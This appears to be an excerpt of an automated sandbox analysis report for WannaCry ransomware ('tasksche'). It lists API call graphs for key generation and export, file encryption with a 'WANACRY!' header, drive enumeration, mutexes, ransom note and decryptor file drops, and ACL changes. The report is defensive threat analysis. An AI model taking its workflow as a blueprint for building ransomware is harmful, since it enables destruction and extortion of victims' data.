      • Part of subcall function 10003620: ??3@YAXPAX@Z.MSVCRT ref: 10003658
      • Part of subcall function 10003620: ??3@YAXPAX@Z.MSVCRT ref: 10003676
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 100011E4
    • OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 10001214
    • GetLastError.KERNEL32 ref: 1000121A
    • GlobalAlloc.KERNEL32(00000040,?), ref: 10001234
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 1000124E
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 1000125F
    • GetProcAddress.KERNEL32(00000000,ConvertSidToStringSidW), ref: 10001275
    • wcscpy.MSVCRT ref: 100012AB
    • GlobalFree.KERNEL32(00000000), ref: 100012B9
    APIs
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
    • GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 100040C0
    • _local_unwind2.MSVCRT ref: 100040D0
    • CreateFileA.KERNEL32(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
    • WriteFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 10004122
    • _local_unwind2.MSVCRT ref: 10004132
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
    • GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
    • CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
    • _local_unwind2.MSVCRT ref: 10003FD5
    • _local_unwind2.MSVCRT ref: 10004017
    APIs
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
    • CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
    • GlobalAlloc.KERNEL32(00000000,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 10004229
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100042BA
    • GlobalFree.KERNEL32(?), ref: 10004320
    APIs
      • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
    • CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003C00: CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
    • CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
      • Part of subcall function 10004350: CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
      • Part of subcall function 10004040: CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
      • Part of subcall function 10004040: GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
      • Part of subcall function 10004040: CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 100040C0
      • Part of subcall function 10004040: _local_unwind2.MSVCRT ref: 100040D0
      • Part of subcall function 10004040: CreateFileA.KERNEL32(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
      • Part of subcall function 10004040: WriteFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 10004122
      • Part of subcall function 10004040: _local_unwind2.MSVCRT ref: 10004132
      • Part of subcall function 10003C40: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10003CA3
      • Part of subcall function 10003C40: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000008), ref: 10003CB8
      • Part of subcall function 10003C40: WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 10003CD3
      • Part of subcall function 10003C40: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 10003CE3
      • Part of subcall function 10003C40: GlobalFree.KERNEL32(00000000), ref: 10003CE7
    • CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
    APIs
    • CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
      • Part of subcall function 10003F00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
      • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
      • Part of subcall function 10003F00: GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
      • Part of subcall function 10003F00: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
      • Part of subcall function 10003F00: CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10003FD5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A21
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A57
    • GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
    • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 10001AC0
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B00
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 10001B3A
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B5D
    • _local_unwind2.MSVCRT ref: 10001B78
    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 10001BAB
    • swprintf.MSVCRT(?,%s%s,?,1000CBE4,?,?), ref: 10001BCC
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10001BEE
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 10001C1A
    • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001C71
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?), ref: 10001C96
    • WriteFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001CAE
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001CDF
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001CFB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001D20
    • rand.MSVCRT ref: 10001D54
      • Part of subcall function 10004370: EnterCriticalSection.KERNEL32(?,00000010,?,?,?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043CA
      • Part of subcall function 10004370: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,10001DBA,?,00000000,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043E7
      • Part of subcall function 10004370: LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043F2
      • Part of subcall function 10004370: LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 10004401
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
    • WriteFile.KERNEL32(?,WANACRY!,00000008,00010000,00000000), ref: 10001E22
    • WriteFile.KERNEL32(?,00000200,00000004,00010000,00000000), ref: 10001E43
    • WriteFile.KERNEL32(?,?,00000200,00010000,00000000), ref: 10001E69
    • WriteFile.KERNEL32(?,00000004,00000004,00010000,00000000), ref: 10001E87
    • WriteFile.KERNEL32(?,?,00000008,00010000,00000000), ref: 10001EA8
    • SetFilePointer.KERNEL32(?,FFFF0000,00000000,00000002,?,?), ref: 10001EEF
    • ReadFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F0B
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F5C
    • SetFilePointer.KERNEL32(?,00010000,00000000,00000000,?,?), ref: 10001F84
    • ReadFile.KERNEL32(?,?,00100000,00010000,00000000), ref: 10001FE8
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10002072
    • _local_unwind2.MSVCRT ref: 1000208E
    • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
    • CloseHandle.KERNEL32(?), ref: 100020DA
    • CloseHandle.KERNEL32(?), ref: 100020E1
    • MoveFileW.KERNEL32(?,?), ref: 10002101
    • SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
    • DeleteFileW.KERNEL32(?,?,?), ref: 10002128
    • CloseHandle.KERNEL32(?), ref: 10002130
    • MoveFileW.KERNEL32(?,?), ref: 1000214D
    • _local_unwind2.MSVCRT ref: 1000218F
    APIs
      • Part of subcall function 10004690: CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
      • Part of subcall function 10004690: GetLastError.KERNEL32(?,10005B11), ref: 100046A6
      • Part of subcall function 10004690: CloseHandle.KERNEL32(00000000), ref: 100046B4
    • GetModuleFileNameW.KERNEL32(?,?,00000103), ref: 10005B45
    • wcsrchr.MSVCRT ref: 10005B58
    • wcsrchr.MSVCRT ref: 10005B68
    • SetCurrentDirectoryW.KERNEL32(?), ref: 10005B75
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 100012D0: GetUserNameW.ADVAPI32 ref: 10001321
      • Part of subcall function 100012D0: _wcsicmp.MSVCRT ref: 10001331
      • Part of subcall function 10003410: LoadLibraryA.KERNEL32(kernel32.dll), ref: 10003433
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,CreateFileW,?), ref: 10003450
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
    • sprintf.MSVCRT ref: 10005BBA
    • sprintf.MSVCRT ref: 10005BCA
    • sprintf.MSVCRT ref: 10005BDA
      • Part of subcall function 10004600: OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
      • Part of subcall function 10004600: CloseHandle.KERNEL32(00000000), ref: 1000461B
      • Part of subcall function 10004600: sprintf.MSVCRT ref: 1000463F
      • Part of subcall function 10004600: CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
      • Part of subcall function 10004600: GetLastError.KERNEL32 ref: 1000465D
      • Part of subcall function 10004600: CloseHandle.KERNEL32(00000000), ref: 1000466B
    • CloseHandle.KERNEL32(00000000), ref: 10005D5E
      • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(?), ref: 1000453C
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
    • ??2@YAPAXI@Z.MSVCRT ref: 10005C00
    • CloseHandle.KERNEL32(00000000), ref: 10005D3B
      • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,76E76DBE,10004558), ref: 10003A28
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003AC0: CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
      • Part of subcall function 100046D0: CreateFileA.KERNEL32(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000), ref: 100046E6
      • Part of subcall function 100046D0: ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000), ref: 10004712
      • Part of subcall function 100046D0: CloseHandle.KERNEL32(00000000), ref: 10004719
    • DeleteFileA.KERNELBASE(00000000.res,00000000.pky,00000000.eky), ref: 10005C66
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    • CreateThread.KERNEL32(00000000,00000000,10004790,00000000,00000000,00000000), ref: 10005CAE
    • CloseHandle.KERNEL32(00000000), ref: 10005CBB
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CC5
    • CreateThread.KERNEL32(00000000,00000000,100045C0,00000000,00000000,00000000), ref: 10005CD1
    • CloseHandle.KERNEL32(00000000), ref: 10005CD8
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CDC
    • CreateThread.KERNEL32(00000000,00000000,10005730,00000000,00000000,00000000), ref: 10005CE8
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CEE
    • CreateThread.KERNEL32(00000000,00000000,10005300,00000000,00000000,00000000), ref: 10005CFF
    • CloseHandle.KERNEL32(00000000), ref: 10005D06
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005D0A
    • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D1B
    • CloseHandle.KERNEL32(00000000), ref: 10005D22
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005D26
      • Part of subcall function 100057C0: GetFileAttributesA.KERNEL32(f.wnry,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10005819
      • Part of subcall function 100057C0: time.MSVCRT ref: 1000583D
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 1000585F
      • Part of subcall function 100057C0: InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
      • Part of subcall function 100057C0: GetLogicalDrives.KERNEL32 ref: 1000591C
      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005964
      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005977
      • Part of subcall function 100057C0: InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 100059DD
      • Part of subcall function 100057C0: time.MSVCRT ref: 100059F6
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 10005A1F
      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005A7D
      • Part of subcall function 100057C0: Sleep.KERNEL32(0000EA60), ref: 10005A98
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D34
    • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D4C
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10005D57
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    APIs
    • OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
    • CloseHandle.KERNEL32(00000000), ref: 1000461B
    • sprintf.MSVCRT ref: 1000463F
    • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
    • GetLastError.KERNEL32 ref: 1000465D
    • CloseHandle.KERNEL32(00000000), ref: 1000466B
      • Part of subcall function 100013E0: GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?), ref: 1000140A
      • Part of subcall function 100013E0: SetEntriesInAclA.ADVAPI32 ref: 1000145E
      • Part of subcall function 100013E0: SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
      • Part of subcall function 100013E0: LocalFree.KERNEL32(?), ref: 10001482
      • Part of subcall function 100013E0: LocalFree.KERNEL32(00000001), ref: 10001489
      • Part of subcall function 100013E0: LocalFree.KERNEL32(?), ref: 10001490
    Strings
    • Global\MsWinZonesCacheCounterMutexA, xrefs: 10004634
    • Global\MsWinZonesCacheCounterMutexW, xrefs: 10004604
    • %s%d, xrefs: 10004639
    APIs
    • CreateProcessA.KERNEL32 ref: 100010D3
    • WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
    • GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
    • CloseHandle.KERNEL32(?), ref: 10001121
    • CloseHandle.KERNEL32(?), ref: 10001128
    APIs
    • fopen.MSVCRT ref: 10005390
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000026B,00000000,00000000), ref: 100053BB
    • fprintf.MSVCRT ref: 100053CC
    • fclose.MSVCRT ref: 100053D3
    APIs
    • GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?), ref: 1000140A
    • SetEntriesInAclA.ADVAPI32 ref: 1000145E
    • SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
    • LocalFree.KERNEL32(?), ref: 10001482
    • LocalFree.KERNEL32(00000001), ref: 10001489
    • LocalFree.KERNEL32(?), ref: 10001490
    APIs
    • GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
    • CloseHandle.KERNEL32(00000000), ref: 10002FC8
    • DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
    APIs
      • Part of subcall function 10004170: CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
      • Part of subcall function 10004170: CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
      • Part of subcall function 10004170: GlobalAlloc.KERNEL32(00000000,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 10004229
      • Part of subcall function 10004170: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100042BA
      • Part of subcall function 10004170: GlobalFree.KERNEL32(?), ref: 10004320
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10003CA3
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000008), ref: 10003CB8
    • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 10003CD3
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 10003CE3
    • GlobalFree.KERNEL32(00000000), ref: 10003CE7
    APIs
    • CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
    • WriteFile.KERNEL32(00000000), ref: 10004775
    • CloseHandle.KERNEL32(00000000), ref: 1000477C
    APIs
    • CreateFileA.KERNEL32(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000), ref: 100046E6
    • ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000), ref: 10004712
    • CloseHandle.KERNEL32(00000000), ref: 10004719
    APIs
    • CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
    • GetLastError.KERNEL32(?,10005B11), ref: 100046A6
    • CloseHandle.KERNEL32(00000000), ref: 100046B4
    Strings
    • MsWinZonesCacheCounterMutexA, xrefs: 10004691
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
    • CopyFileW.KERNEL32(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
    APIs
    • time.MSVCRT ref: 100047AA
      • Part of subcall function 10004730: CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
      • Part of subcall function 10004730: WriteFile.KERNEL32(00000000), ref: 10004775
      • Part of subcall function 10004730: CloseHandle.KERNEL32(00000000), ref: 1000477C
    • Sleep.KERNELBASE(000003E8), ref: 100047C9
    • ExitThread.KERNEL32 ref: 100047DC
    APIs
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • Sleep.KERNELBASE(00007530), ref: 10005326
    APIs
      • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(?), ref: 1000453C
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
    • Sleep.KERNELBASE(00001388), ref: 100045E3
    • ExitThread.KERNEL32 ref: 100045E9

    Non-executed Functions

    APIs
    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
    • wcslen.MSVCRT ref: 10004A9E
    • wcsrchr.MSVCRT ref: 10004AC0
    • wcschr.MSVCRT ref: 10004AE9
    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
    • wcslen.MSVCRT ref: 10004B25
    • wcsrchr.MSVCRT ref: 10004B3D
    • swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
    • FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
    • wcscmp.MSVCRT ref: 10004BD7
    • wcscmp.MSVCRT ref: 10004BF5
    • swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
    • wcscmp.MSVCRT ref: 10004C51
    • swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
    • FindNextFileW.KERNEL32(?,?), ref: 10004CA2
    • FindClose.KERNEL32(?), ref: 10004CB5
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 10004456
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?), ref: 10004473
    • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
    APIs
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 10004F7C
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 10004F99
    • CopyFileW.KERNEL32(?,?,00000000), ref: 10004FB4
    • GetUserNameW.ADVAPI32 ref: 10004FF0
    • _wcsicmp.MSVCRT ref: 10005006
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 1000501E
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 10005034
    • CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000000), ref: 10005045
    APIs
    • InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
    • Sleep.KERNEL32(000003E8), ref: 100055CB
    • GetDriveTypeW.KERNEL32(?), ref: 100055E9
    • GetDriveTypeW.KERNEL32(00000000,00000000,00000019,76E6EEF2,00000000), ref: 100055FD
    • InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
    • GetDriveTypeW.KERNEL32(?), ref: 10005615
      • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
      • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
      • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
      • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
      • Part of subcall function 10005060: swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
      • Part of subcall function 10005060: CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
      • Part of subcall function 10005060: sprintf.MSVCRT ref: 100050FE
